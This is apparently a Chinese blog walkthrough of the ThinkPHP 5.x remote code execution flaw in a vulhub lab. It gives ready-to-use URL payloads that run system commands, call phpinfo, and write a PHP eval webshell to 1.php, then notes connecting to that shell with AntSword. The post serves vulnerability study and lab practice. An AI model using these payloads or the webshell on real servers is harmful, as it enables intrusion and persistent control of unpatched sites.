当前位置: 首页 > article >正文

Thinkphp5x远程命令执行 靶场攻略

环境配置

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://172.16.1.198:8080/

2.远程命令执⾏

POC:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

[]=whoami

3.远程代码执行

POC:
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

4.写入一句话木马到根目录下的1.php

POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>" > 1.php

5.蚁剑连接

 


http://www.kler.cn/a/322693.html

相关文章:

  • OpenSSL 自签名
  • nuget 管理全局包、缓存和临时文件夹
  • 【springboot】启动原理
  • 动态规划之股票系列
  • 使用 Go 实现将任何网页转化为 PDF
  • linux笔记(防火墙)
  • vue使用PDF.JS踩的坑--部署到服务器上显示pdf.mjs viewer.mjs找不到资源
  • Elasticsearch黑窗口启动乱码问题解决方案
  • 同声传译软件推荐哪个好?这些工具助你提升翻译效率
  • 物联网系统中声音拾取音频方案_咪头
  • element plus block报错
  • “创新驱动·融合发展”长三角软件产业盛会“2024南京软博会”
  • neo4j关系的创建删除 图的删除
  • Linux `readlink` 命令详解:轻松解析符号链接
  • C++在线开发环境搭建(WEBIDE)
  • 风景视频素材高清无水印怎么找?推荐几个风景视频素材下载网站
  • uniapp APP自动更新组件
  • 华为的数据库安全审计的功能怎么样?
  • Java后端面试题(微服务相关2)(day13)
  • DRF实操学习——收货地址的设计
  • Oracle逻辑备份脚本【生产环境适用】
  • 深入浅出CSS盒子模型
  • 命令行基础指令速查(Linux/Mac适用)
  • 【HTTP 和 HTTPS详解】2
  • 【30天玩转python】并发编程
  • 黎巴嫩BP机爆炸事件启示录:我国应加快供应链安全立法